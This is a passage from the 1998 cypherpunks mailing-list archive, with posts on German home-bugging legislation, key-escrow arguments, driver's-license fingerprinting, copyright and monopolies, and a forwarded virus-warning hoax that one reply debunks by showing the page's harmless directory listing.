to include protection for some groups -- including journalists, doctors
and some lawyers. 
 
The proposed law has raised warnings about reviving the police state
tactics of the Nazi regime and former communist East Germany. Mostly,
though, critics are worried about breaching confidentiality essential to
some professions, such as doctors. 
 
Outside of government, journalists and doctors have been the most vocal
critics of the draft law, which currently shields conversations between
suspects and clergy, parliamentarians, and defense lawyers. 
 
Journalists view the proposed law as an attack on press freedom. 
 
``It's not about privilege for journalists,'' the chairman of the German
Journalist Association, Hermann Meyn, wrote in an open letter to
parliament. ``It's about protection of news room secrets, essential press
freedoms.''
 
The vote Friday weakened the constitutional guarantee of the sanctity of
ones home by defining situations when police could bug homes:  during
investigation of serious crimes -- such as murder, kidnapping, extortion,
arms and drug trafficking -- with the approval of three judges. 
 
The changes necessary for the law also would allow electronic
eavesdropping on suspects after a crime has been committed -- not just to
prevent crime -- and for the first time allows information from bugging
devices to be entered as evidence. 
 
Organized crime has risen sharply in Europe since the collapse of
communist regimes in Russia and Eastern Europe, which loosened previously
closed borders. Drug trafficking, car theft and smuggling of cigarettes,
illegal immigrants and even nuclear material has increased. 
 
The law must be passed by both houses of parliament. 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 7 Feb 1998 04:18:04 +0800
To: "Trei, Peter" <ptrei@securitydynamics.com>
Subject: Re: FW: SEC Rule Announcement
In-Reply-To: <6B5344C210C7D011835C0000F8012766010035B3@exna01.securitydynamics.com>
Message-ID: <v03007803b101146bc8fc@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



Peter is quite right that the interesting part is HOME computers. It's the
Electronic Messaging Association, BTW. My article with comments from them,
SEC, NASD, ACLU, etc. is at:

   http://cgi.pathfinder.com/netly/opinion/0,1042,1731,00.html

The SEC may have approved a rule that violates federal law.

-Declan


At 17:00 -0500 2/4/98, Trei, Peter wrote:
>[sorry if you get this twice - pt]
>
>I have not been able to confirm the claim in this letter - the EMA
>does not seem to have a web site. Note that it refers to
>employers monitoring employee's HOME computers.
>
>Peter Trei
>
>> -----Original Message-----
>> From:	Larry Layten [SMTP:larry@ljl.com]
>> Sent:	Wednesday, February 04, 1998 11:04 AM
>> To:	cryptography@c2.net
>> Subject:	SEC Rule Announcement
>>
>> I received information in an Electronic Mail Association (EMA)
>> bulletin that said the Securities and Exchange Commission
>> approved a rule that would go into effect February 15th that
>> requires securities employers to have the ability to monitor
>> electronic communications between employees and customers
>> on employees' home computers or through third party systems.
>>
>> Does anyone have any more information on this and how it
>> might apply to encrypted email?
>>
>> Larry







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 7 Feb 1998 07:07:30 +0800
To: cypherpunks@cyberpass.net
Subject: Re: the best justice/kinds of monopolies
In-Reply-To: <34DA3157.1FF4FA7A@ssds.com>
Message-ID: <v03102801b10142692f86@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:52 PM -0800 2/5/98, Bill Frantz wrote:
>At 1:38 PM -0800 2/5/98, in a generally right on post, Jim Burnes wrote:
>>(this and the strange tendency of
>>workers
>>to "go postal" -- you rarely hear about FedEX employees going on
>>an
>>AK47 rampage, must be the water ;-)
>
>No, the problem is the US Postal Service's willingness to tolerate assholes
>as managers.  There may be an argument for pinning that on the government
>monopoly aspects of the USPS as well.

Not just the managers, but the ordinary employees...

The Postal Service is effectively bound to keep employees on that any
normal business would have simply given the boot to.

The benefits of government service....

(Yes, yes, I know some of you will be tempted to cite the official line
that the Postal Service is no longer a government agency. Well, this is a
distinction without a difference. The USPS retains governmental protections
against competition, has government-like powers and protections, and is
still run by a "Postmaster General," not a Chairman of the Board or
President or CEO. It ain't FedEx or Airborne. Or even UPS, which emulates
government agencies.)


--Tim May

"National borders aren't even speed bumps on the information superhighway."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 7 Feb 1998 04:24:39 +0800
To: cypherpunks@toad.com
Subject: Re: FW: SEC Rule Announcement
Message-ID: <199802061953.OAA04651@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From cypherpunks-errors@toad.com Fri Feb  6 14:41:14 1998
   >   
   >   Peter is quite right that the interesting part is HOME computers. It's the
   >   Electronic Messaging Association, BTW. My article with comments from them,
   >   SEC, NASD, ACLU, etc. is at:
   >   
   >      http://cgi.pathfinder.com/netly/opinion/0,1042,1731,00.html
   >   
   >   The SEC may have approved a rule that violates federal law.
   >   
   >   -Declan

It was quite unnecessary: all a company has to do is require
all company business email contact go through the company's systems,
even if home.

Furthermore, brokers send email during the work day - like the
list of AXEs they have for that day - and send it in the morning.

Home email directly to clients is basically non-existent.

----

Stange, how monitoring home email to third parties would be illegal,
but Deutsche Bank showing up at a random time to demand (and watch)
you give a urine sample is completely legal.
---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Feb 1998 04:52:25 +0800
To: cypherpunks@toad.com
Subject: STOA Report Bibliography
Message-ID: <1.5.4.32.19980206202304.0071da54@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



We've transcribed the 26-page bibliography of STOA's
"An Appraisal of the Technologies of Political Control:"

   http://jya.com/stoa-bib.htm  (85K)

Zipped version:

   http://jya.com/stoa-bib.zip  (32K)

The substantiating details of the cited literature -- study after
study of the consequences of inhumane policy and savage 
commerce eager to oblige it -- are grimmer than the main 
report. A steady drumbeat for ever more ingenious technology 
to enforce submission.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 7 Feb 1998 09:30:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Fingerprinting in CA [was Whoa: British SmartCard rollout]
In-Reply-To: <19980205.000739.attila@hun.org>
Message-ID: <v03102802b1016269b45d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:40 AM -0800 2/6/98, Bill Stewart wrote:
>>>   How did you CA cypherpunks feel about being fingerprinted?
>
>Well, if I'd been thinking about it, I'd have put some rubber cement and
>whiteout on my thumb before getting the license :-)
>More the issue at the time was that the politicians were
>busy deciding that your ability to drive safely obviously depended
>on whether your citizenship papers were in order (the month
>I got it they'd temporarily stopped doing that.)
>I recently renewed the license, and they didn't ask for papers
>or thumbprints, but they still don't print the license at the
>remote DMV offices; they print them centrally because it simplifies
>verifying your information with the INS thugs.

And don't forget the "Department of Deadbeat Dads" thugs. As I recall
things, there was a bill passed in the California legislature to beef up
computerized tracking of driver-units so that deabeat-units can be
identified and marked for collection.

The invasions of privacy in the driver's license process is just
symptomatic of a larger problem:

* government claims that some activity is a "privilege, not a right," and
so claims that normal constitutional protections are irrelevant.

(One wonders if they believe the First Amendment doesn't apply, that Big
Brother may monitor what drivers are saying and deny licenses to political
troublemakers: "driving is a privilege, not a right.")

* government claims that the "regulation of commerce" language applies much
more broadly than the original interstate commerce and very general
rule-making language.

(One abuse of this was to say that if a student received federal loans, a
college could not practice certain of its normal practices...and the
college was forbidden from stopping the student from receiving these loans!
Catch-22. At this rate, churches will come under federal regulation because
they receive Postal Service deliveries. Or because government roads are
their only access.  And so on.)


>Back when I lived in New Jersey, the cops would set up traffic stops
>not only to look for drunk drivers (at 9am?!), but also to check
>if your papers were in order.  I haven't seen much of that in California,
>but presumably the Southern part of the state does it more often
>to catch Spanish speakers who are loose in the population.

Warrantless roadblocks are in place in my town, and, according to the local
newspaper, any driver who is seen turning around so as to avoid the
roadblock check will have his vehicle subject to detailed search.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Sun, 8 Feb 1998 18:23:23 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: the best justice/kinds of monopolies
In-Reply-To: <v03110703b10070d62719@[207.94.250.77]>
Message-ID: <3.0.5.32.19980206174114.007b4ac0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:47 PM 2/6/98 -0800, Tim May wrote:
>(Yes, yes, I know some of you will be tempted to cite the official line
>that the Postal Service is no longer a government agency. Well, this is a
>distinction without a difference. The USPS retains governmental protections
>against competition, has government-like powers and protections, and is
>still run by a "Postmaster General," not a Chairman of the Board or
>President or CEO. It ain't FedEx or Airborne. Or even UPS, which emulates
>government agencies.)

I don't care if they call their boss Grand Wazoo Snail Mail Evangelist;
there are software and ice cream companies that use non-standard titles too.
"Postal Inspector" is a much more serious problem title, since they
seem to have quasi-police powers to do criminal investigations of
postal offenses like pornography and pyramid scams and running competing
formatted-tree-product information delivery services.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sphantom <shadow@tfs.net>
Date: Sat, 7 Feb 1998 08:27:48 +0800
To: "cypherpunks@toad.com>
Subject: Lets check this out
Message-ID: <34DBA006.46743131@tfs.net>
MIME-Version: 1.0
Content-Type: text/plain



Here is something for us to check out. Was just emailed to me today.

I am curious how this person does it.

Dear Friends,

If someone named SandMan asks you to check out his page on the WEB

DO NOT!!!

It is at www.geocities.com/vienna/6318

This page hacks into your C:/ drive.  DO NOT GO THERE

 HE WILL REQUEST A CHAT WITH YOU....don't do it.

FORWARD THIS TO EVERYONE...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Sat, 7 Feb 1998 10:09:00 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Most elegant wording against privacy/law-enforcement "balance"
Message-ID: <9802070144.AA11833@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



Guy skribis:
> What are the most elegant rebuttals to politicians saying we
> need Key Recovery as a "reasonable balance between the needs of
> law enforcement vs. freedom of crypto"?

I don't know how elegant it is, but here's my response:

Compromising the public's right to privacy gives away not only our own
rights, but those of our descendants.  The government must make an
extraordinary case to justify undermining those rights, and so far it
has not done so.

The most detailed research on the issue is a study by Dorothy Denning
and William Baugh investigating the extent to which crypto has
interfered with law enforcement's ability to get convictions: their
bottom line was that crypto has not in fact interfered: law enforcement
has been able to complete their investigations using other means.
There's no demonstrated need for Government Access to Crypto Keys
(GACK), so there's no need to compromise away our privacy.

	Jim Gillogly
	jim@acm.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Sat, 7 Feb 1998 15:02:24 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
In-Reply-To: <199802051634.KAA02262@einstein.ssz.com>
Message-ID: <3.0.5.32.19980206181238.007b4ac0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:34 AM 2/5/98 -0600, Jim Choate wrote:
>If there were no copyright nobody would have any reason to market 
>software or much else for that matter. I would predict that much of 
>the technology and infrastructure we have now wouldn't exist. 
>It would also stiffle [sic] creativity and new methodologies because 
>there would be no profit in it to recoup development costs.

If there were no copyright, markets for information and entertainment
would definitely have evolved differently than they have in the US
and Europe, and would use much different mechanisms for getting money
to the producers of information, such as standard sale contracts.*
On the other hand, if there were no colonialism, markets for sheep in
New Zealand would have evolved much differently than they did,
a problem they're now gradually working their way out of.

The music business, for example, handles paying authors when their works
are performed by performers through mechanisms other than just
charging big bucks for sheet music.  The Free Software Foundation found
that with a bit of academic and military socialism to jump start it,
there are a lot of reasons for people to create value and beauty,
and you can even talk corporations into paying money for support.
Van Gogh found good reasons to paint, in spite of being broke.
Michaelangelo found good reasons to paint, and Gutenberg found
good reasons to print, in spite of not having copyright protection.
Newspapers eveolved in an environment where copyright wasn't a big deal;
if your competitors ripped off your stories, they were a day late,
and you could rag them about it in your own paper.
Mainframe software evolved in an environment where contracts
covered use of the software, and copyright was seldom relevant;
that has gradually changed with mass-market computers, but
it took a while for courts to accept the idea of copyrighting
software, and the industry didn't refrain from writing the stuff.

Copyright is certainly a major market convenience, because it means
that individual authors, middlemen, and readers don't have to
negotiate contracts each time they trade information for money,
or having to read the annoying shrink-wrap licenses on books
the way they did for a while on packaged software.  It also
makes it more difficult for alternative mechanisms to evolve,
because it's got an 800-pound well-armed gorilla subsidizing it.


>Those who would survive in such a market would be
>the 800-lb gorillas because only they would have the resources 
>to squash the smaller companies.
If I read Mark's note correctly, the gorilla he was talking about
wasn't MicroSloth, it was the government.  We may joke about Gates
being the Evil Empire, but it's clearly a joke; we've seen the real thing.

>Free markets monopolize.
and in a following note, Jim says that that's true mainly for the
long run, not necessarily for the short run.  It's not only incorrect,
especially as expanded upon, it's irrelevant to the moral question.
If your alternatives are free markets, where you and I can 
offer to buy or sell products without anybody beating us up for it,
versus non-free markets, where some gang can beat us up for
not going along with the program (whether the gang is the Mafia,
the Pinkertons, the KGB, or "your neighbors in a democracy"),
there's no question which is morally acceptable - even if the
violence-based market is often more convenient for some goods.

But morality aside,  monopoly, in the sense of a single player
or small group of players domination the sales of a commodity,
is something that can certainly happen in the short run but is
unstable in the long run unless the competition can be prevented
by threats of violence (whether by the monopoly or the government.)
If people are free to offer competing products, maintaining market
share is difficult, and the market leader not only has to contend
with the other big dogs, but with being nipped to death by Chihuahuas,
and with being made obsolete by better technologies.
Who monopolizes tabletop radios these days?  (Who cares?)
Who monopolizes Video Cassette Recorders?  They're both relatively 
free markets, in spite of the FCC's attempts to enforce standards,
and Sony's attempts to monopolize the BetaMax market.
On the other hand, radio and TV broadcasting are near-monopolies,
because the Feds have been "helping" protect our public airwaves.

------------
* Some Libertarians and some Libertarian-bashers will argue that using
government courts to enforce contracts is still hiring the 800-pound 
well-armed gorilla to carry out your private business activities....
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 7 Feb 1998 10:25:02 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Most elegant wording against privacy/law-enforcement "balance"
In-Reply-To: <199802070106.UAA01015@panix2.panix.com>
Message-ID: <v03102803b10170fb20b7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:06 PM -0800 2/6/98, Information Security wrote:
>What are the most elegant rebuttals to politicians saying we
>need Key Recovery as a "reasonable balance between the needs of
>law enforcement vs. freedom of crypto"?
>
>I wasn't too elegant in the Crypto Manifesto.

I  like this for starters:

"Congress shall make no law respecting an establishment of religion, or
prohibiting the free exercise thereof; or abridging the freedom of speech,
or of the
press; or the right of the people peaceably to assemble, and to petition
the Government for a redress of grievances. "

Of course, some in Washington consider this to be a seditious sentiment.

But serious, "Information Security" is asking for too much. He is asking us
to give our personal opinions about the "most elegant" arguments. Debates
about key escrow have been raging for almost five years now. He's not
likely to get new arguments here, or newly-written articles.

I urge him to either consult the archives of this list or the thousands of
articles in many places.

Search engines are a good way to find them.

Of course, I expect various folks will answer his call and write down their
reasons. I just doubt strongly that they'll be arguments as good as what
was written years ago.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 7 Feb 1998 10:53:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Most elegant wording against privacy/law-enforcement "balance"
In-Reply-To: <9802070144.AA11833@mentat.com>
Message-ID: <v03102804b101759635ad@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




I strongly, emphatically, disagree with the reasoning used here by Jim
Gillogly:

At 5:44 PM -0800 2/6/98, Jim Gillogly wrote:
>Guy skribis:
>> What are the most elegant rebuttals to politicians saying we
>> need Key Recovery as a "reasonable balance between the needs of
>> law enforcement vs. freedom of crypto"?
>
>I don't know how elegant it is, but here's my response:
>
>Compromising the public's right to privacy gives away not only our own
>rights, but those of our descendants.  The government must make an
>extraordinary case to justify undermining those rights, and so far it
>has not done so.

"So far it has not done so."

This "argument based on utilitarian need" is at odds with the First
Amendment. The notion that a form of speech in letters and phone calls and
conversations could be compelled because, say, the government concludes
that it is needed to stop some criminal actions, is ludicrous.

A policy requiring certain forms of speech is no different from a policy
saying the government may enter a house when it wishes.

I am drawing the parallel with the Fourth deliberately: no amount of
"study," even a study by such august persons as Denning and Baugh, could
ever conclude that wholesale, unwarranted searches are permissable. The
Fourth was put in just to stop such broad conclusions.

Likewise, the First is clearly directed against such broad restrictons on
speech (and religion, and assembly, and complaining (petitioning)) so that
no "study" can be used to broadly restrict speech.

And make no mistake about it, whatever the accepted arguments for
restricting certain types of speech (notoriously, the "Fire!" example) are,
they are not consistent with a broad requirement that persons face
imprisonment if they speak in codes, or fail to use transparent envelopes,
or disconnect the microphones in their homes!

>The most detailed research on the issue is a study by Dorothy Denning
>and William Baugh investigating the extent to which crypto has
>interfered with law enforcement's ability to get convictions: their
>bottom line was that crypto has not in fact interfered: law enforcement
>has been able to complete their investigations using other means.
>There's no demonstrated need for Government Access to Crypto Keys
>(GACK), so there's no need to compromise away our privacy.

Bluntly pu, "FUCK "DEMONSTRATED NEED"!"

And what if Denning and Baugh had reached other conclusions? (As well they
might, next year, when crypto is more widely deployed.)

I have strongly argued over the years against ever using some "government
study" as the basis for our arguments, even when the studies appear to
support our position.

What the studies giveth, the studies can taketh away.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 7 Feb 1998 08:21:03 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting in CA [was Whoa: British SmartCard rollout]
Message-ID: <199802070004.TAA27622@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From bill.stewart@pobox.com Fri Feb  6 18:50:28 1998
   >   
   >   >>   How did you CA cypherpunks feel about being fingerprinted?
   >   
   >   Well, if I'd been thinking about it, I'd have put some rubber cement and
   >   whiteout on my thumb before getting the license :-)

   >   More the issue at the time was that the politicians were
   >   busy deciding that your ability to drive safely obviously depended
   >   on whether your citizenship papers were in order (the month
   >   I got it they'd temporarily stopped doing that.)

But it is being rolled out all over, state-by-state, never a vote.

They don't have problems with illegal aliens in Georgia, USA.

A mercifully brief CM excerpt:
 
*   Dr. Linda Thompson:
*   YOUR STATE IS NEXT AND DON'T THINK OTHERWISE.  Sandia and other defense
*   contractors, without a war elsewhere, are OUT OF WORK, so they're
*   creating job security for themselves by helping fascists wage war in the
*   United States on us and our rights!!
*
*   Georgia, Texas and Oregon ALREADY require fingerprints for licenses.
 
>   California is already fingerprinting drivers, and many places outside of
>   the US are creating identity cards with barcoded information.
>
>   Also, AmSouth and Compass Banks will soon introduce fingerprinting of
>   people who cash checks and have no account with their bank.  This is
>   now standard practice in Texas and will soon be nation-wide.

Oregon?

It's like Wired magazine reported: the NSA is behind it all.

The DMV records are online 24 hours for FBI access.

   >   I recently renewed the license, and they didn't ask for papers
   >   or thumbprints...

They already got your number.

When will some group express organized opposition to this?
---guy

   Your fingerprint tattoo.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 7 Feb 1998 09:34:11 +0800
To: cypherpunks@toad.com
Subject: Most elegant wording against privacy/law-enforcement "balance"
Message-ID: <199802070106.UAA01015@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



What are the most elegant rebuttals to politicians saying we
need Key Recovery as a "reasonable balance between the needs of
law enforcement vs. freedom of crypto"?

I wasn't too elegant in the Crypto Manifesto.
---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 7 Feb 1998 11:09:31 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Most elegant wording against privacy/law-enforcement "balance" (fwd)
Message-ID: <199802070250.UAA09222@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 6 Feb 1998 18:31:49 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: Most elegant wording against privacy/law-enforcement "balance"

> >Compromising the public's right to privacy gives away not only our own
> >rights, but those of our descendants.  The government must make an
> >extraordinary case to justify undermining those rights, and so far it
> >has not done so.
> 
> "So far it has not done so."
> 
> This "argument based on utilitarian need" is at odds with the First
> Amendment.

It's at odds with the entire concept of 'inalienable rights' and 'government
instituted by the governed'.

> I am drawing the parallel with the Fourth deliberately: no amount of
> "study," even a study by such august persons as Denning and Baugh, could
> ever conclude that wholesale, unwarranted searches are permissable. The
> Fourth was put in just to stop such broad conclusions.

I would say more broadly the Constitution and in particular the Bill of
Rights was implimented to eliminate these issue from the federal level.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Sun, 8 Feb 1998 18:20:18 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
In-Reply-To: <199802061421.IAA05806@einstein.ssz.com>
Message-ID: <3.0.5.32.19980206211343.007b4ac0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:21 AM 2/6/98 -0600, Jim Choate wrote:
> Let's give the market another 5-10 years and see where Linux
>stands. Right now the estimate is 6-10 million users world wide use it. Share
>wise that isn't a lot. The reason that Linux garners so much press right now
>is that it is in fact an exception when an organization uses the software
>(eg NASA). The test will be whether it grows significantly over the long
>run and not the 5 years that Linux has been a serious os.

Sharewise, that's not bad for a system that had 1 million users a 
year or two ago, though of course it gains a lot of extra slack
because it's quasi-free Unix on an affordable platform.
Getting that much desktop support without running MSOffice is
impressive.  Getting lots of support for servers is a different issue;
we've known for a decade and a half that if you want to actually
build a system that will _do_ real work for you, you use Unix*,
even if you use a different desktop GUI.  NT has been improved enough
that you can occasionally build services on it if you're desperate
enough, though its stability is still less than ideal.
(I never had it crash except for hardware mismatch reasons,
but its networking stuff reflects the fact that MS still doesn't
understand what networks are.)

---
* In a few environments you'd use VMS, because for all DEC's faults,
they were very strong on making sure they had software environments to
support the applications their customers wanted, like factory control.
Or you could use LispMachines, because they were nice.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Sat, 7 Feb 1998 11:21:51 +0800
To: cypherpunks@ssz.com
Subject: Re: Lets check this out *yawn*
In-Reply-To: <34DBA006.46743131@tfs.net>
Message-ID: <34DBCD51.E7B8DC7B@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain



This person doesn't do it...there is nothing on the site that is in the
least bit out of the ordinary.
Here is the HTML.  There IS a great hacking page run by a guy named
Sandman...
http://www.unitedcouncil.org is the URL for that one.
-Scott Brower
http://www.infowar.com
http://www.efflorida.org


<HTML><HEAD>
<TITLE>Index of /Vienna/6318</TITLE>
</HEAD><BODY>
<H1>Index of /Vienna/6318</H1>
<PRE><IMG SRC="/icons/blank.gif" ALT="     "> Name
Last modified     Size  Description
<HR>
<IMG SRC="/icons/back.gif" ALT="[DIR]"> <A HREF="/Vienna/">Parent
Directory</A>       06-Feb-98 14:23      -
<IMG SRC="/icons/sound2.gif" ALT="[SND]"> <A
HREF="ACDC.MID">ACDC.MID</A>               10-Sep-97 05:12    21k
<IMG SRC="/icons/sound2.gif" ALT="[SND]"> <A
HREF="AXEL-F.MID">AXEL-F.MID</A>             10-Sep-97 05:13    35k
<IMG SRC="/icons/sound2.gif" ALT="[SND]"> <A
HREF="GANGSTA.MID">GANGSTA.MID</A>            10-Sep-97 05:13    60k
<IMG SRC="/icons/sound2.gif" ALT="[SND]"> <A
HREF="HCALIF.MID">HCALIF.MID</A>             10-Sep-97 05:14   136k
<IMG SRC="/icons/text.gif" ALT="[TXT]"> <A
HREF="INDEX.HTML">INDEX.HTML</A>             10-Sep-97 05:12     4k
<IMG SRC="/icons/sound2.gif" ALT="[SND]"> <A
HREF="ISWEAR.MID">ISWEAR.MID</A>             10-Sep-97 04:53    20k
<IMG SRC="/icons/image2.gif" ALT="[IMG]"> <A
HREF="MAILX.GIF">MAILX.GIF</A>              10-Sep-97 04:53     3k
<IMG SRC="/icons/image2.gif" ALT="[IMG]"> <A
HREF="MURLK.JPG">MURLK.JPG</A>              10-Sep-97 04:53     6k
<IMG SRC="/icons/image2.gif" ALT="[IMG]"> <A
HREF="ROCKET.GIF">ROCKET.GIF</A>             10-Sep-97 04:53     2k
<IMG SRC="/icons/text.gif" ALT="[TXT]"> <A
HREF="SDFDB.HTM">SDFDB.HTM</A>              10-Sep-97 05:01     4k
<IMG SRC="/icons/sound2.gif" ALT="[SND]"> <A
HREF="STAIRWAY.MID">STAIRWAY.MID</A>           10-Sep-97 05:02    28k
</PRE></BODY></HTML>


sphantom wrote:

> Here is something for us to check out. Was just emailed to me today.
>
> I am curious how this person does it.
>
> Dear Friends,
>
> If someone named SandMan asks you to check out his page on the WEB
>
> DO NOT!!!
>
> It is at www.geocities.com/vienna/6318
>
> This page hacks into your C:/ drive.  DO NOT GO THERE
>
>  HE WILL REQUEST A CHAT WITH YOU....don't do it.
>
> FORWARD THIS TO EVERYONE...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 8 Feb 1998 13:28:27 +0800
To: cypherpunks@cyberpass.net
Subject: PGP/McAfee no longer allowing downloads
In-Reply-To: <34DBA006.46743131@tfs.net>
Message-ID: <3.0.2.32.19980206222052.0378ca48@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone else noticed that PGP Inc. has stopped allowing downloads (even for money) from pgp.com?  If you go to buy, all you get is the promise of a mailed CD.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 8 Feb 1998 13:28:59 +0800
To: Bill Stewart <cypherpunks@cyberpass.net>
Subject: Re: Fingerprinting in CA
In-Reply-To: <19980205.000739.attila@hun.org>
Message-ID: <3.0.2.32.19980206223532.03713264@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 07:40 AM 2/6/98 -0800, Bill Stewart wrote:
>>>   How did you CA cypherpunks feel about being fingerprinted?
>
>Well, if I'd been thinking about it, I'd have put some rubber cement and
>whiteout on my thumb before getting the license :-)

A person of my acquaintance was recently involved in a traffic accident in a 
Northeast state.  Out-of-state (but in country) car registered in someone 
else's name and carrying a drivers license issued by a NATO ally.  Ticketed 
for running a red light.  No further problems.  Could have been a deadbeat 
dad for all I know...

As legal as church on a Sunday.

DCF

"Has anyone noticed that there are *more* foreigners around here than there 
used to be before they started cracking down on illegals."  
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBNNvWgoVO4r4sgSPhAQEvvAQAshcy4goUXXpkNqTqjyuUtI6afHXfxnn+
yRQ6yoCGXnp/eBxqKjvYiPzNjGj/wHwBOyVRQIvvvtZ4HXEKAffQ7PbNu19/DlSV
h5c7g8YVYTEsG2nqymfi919dAWDzPKN7JRpfkZxSw50zYsZ5dlIBnOe+3twj5jW6
+auNqh0o8YQ=
=3kId
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 7 Feb 1998 10:03:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Lets check this out
In-Reply-To: <34DBA006.46743131@tfs.net>
